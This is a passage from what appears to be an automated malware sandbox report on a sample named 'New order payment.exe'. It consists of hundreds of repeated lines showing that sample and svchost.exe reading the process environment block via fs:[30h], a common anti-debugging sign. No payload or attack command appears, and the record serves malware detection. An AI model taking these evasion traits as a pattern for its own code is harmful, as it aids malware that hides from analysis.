          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A33D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00998794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00984F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00984F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03831B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03831B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03852397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03854BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03854BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03854BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038D23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03853B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03853B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0383AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03852ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03852AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03838A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03825210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03825210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03825210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03825210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0382AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03843A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03864A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03864A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0386927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03852990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
